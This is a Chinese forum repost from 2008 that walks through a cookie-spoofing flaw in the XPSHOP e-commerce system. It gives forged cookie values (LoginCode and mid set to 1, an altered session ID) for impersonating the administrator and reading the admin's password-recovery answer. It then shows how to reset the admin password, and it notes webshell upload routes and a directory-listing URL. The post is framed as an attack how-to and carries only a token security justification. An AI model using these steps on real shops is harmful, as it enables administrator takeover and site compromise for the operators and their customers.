服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

dirtysea 发表于 2008-11-5 05:02:45

XPSHOP商城系统Cookies欺骗漏洞

<DIV class=entry-content>
<P>文章作者:121711090<BR>信息来源:邪恶八进制信息安全团队(www.eviloctal.com)</P>
<P>无意中发现这个漏洞的..官方现在还不知道...我没有在别处公布哦..<BR>这个漏洞不好...要直拉改人家管理员密码!!有点儿缺德!!!...<BR>但为了我们的网络更安全..还是看看吧...</P>
<P>首先先看看这个站吧:<A href="http://demo1.xpshop.cn/" target=_blank>http://demo1.xpshop.cn/</A><BR>先注册一个用户进去..为了方便也为了不要那么垃圾账户在人家系统里.我这说一下我注册好了的用户名:wc1217 密码:77423704</P>
<P>好..还是用啊D打开网站比较好..看截图:记得要保留cookies<BR><BR><IMG alt="" src="http://pic.yupoo.com/sunlei/815836713288/g8sdd6yq.jpg" border=0><BR>之后便看看他的Cookies...<BR><IMG height=73 alt="" src="http://pic.yupoo.com/sunlei/382036713287/05iyq85d.jpg" width=500 border=0><BR><STRONG>代码:</STRONG></P><PRE><CODE>LoginCode=0684; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=14</CODE></PRE>
<P>我们改一下这两个值:LoginCode=0684;mid=14&nbsp; &nbsp;.......都改成1&nbsp; &nbsp;&nbsp; &nbsp;:</P>
<P><STRONG>代码:</STRONG></P><PRE><CODE>LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1</CODE></PRE>
<P>点击修改..后右键刷新看一下..要注意.不要刷得太快...不然就没用了..</P>
<P>之后就成这样了:<BR><IMG alt="" src="http://pic.yupoo.com/sunlei/133306713287/u2wjexjm.jpg" border=0><BR>当然..也有可能没有..那我们就要改一下:"ASP.NET_SessionId=" 这个值就好了..随便改一个字就行:如下:</P>
<P><STRONG>代码:</STRONG></P><PRE><CODE>LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=fu1q1w3g3qc2vn55naohei55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1</CODE></PRE>
<P>好了..现在再看看会员信息:<BR>是不是有一个"找回密码答案:"呵.....个位都想到了吧..直接就能改管理员密码了..<BR>http://demo1.xpshop.cn/memberLostpass.aspx这个是改密码的..<BR>如下图:<BR><IMG alt="" src="http://pic.yupoo.com/sunlei/636136713287/9sj5ebb2.jpg" border=0><BR>成功.....http://demo1.xpshop.cn/admin/default.aspx这里登录后就是怎么拿WEBSHELL了..<BR>可是我一直没弄成..理论是只有这样才行..看..<BR><IMG alt="" src="http://pic.yupoo.com/sunlei/813166713287/fg67p7eb.jpg" border=0><BR>先插马..再备份..但这里出错了..<BR>还望达人能想出更好的办法..<BR>我想了一晚上了....没辙了....<BR>http://demo1.xpshop.cn/admin/ftb.imagegallery.aspx?frame=1&amp;rif=admin&amp;cif=admin 这可以列目录</P>
<P>好..就那么多了....有哪位达人弄出好办法了..千万别望了告诉我呀...联系方式:http://blog.sina.com.cn/qq1217</P>
<P>http://demo1.xpshop.cn/helps/t.txt</P>
<P>添加flash广告处可直接上传马</P>
<P>营销管理 - flash广告添加</P></DIV>

新疆人胡胡 发表于 2006-6-15 21:28:29

re:XPSHOP商城系统Cookies欺骗漏洞

哈哈哈哈,海东青还是做鹰好吧.!!!!!!!!!!!!!11
页: [1]
查看完整版本: XPSHOP商城系统Cookies欺骗漏洞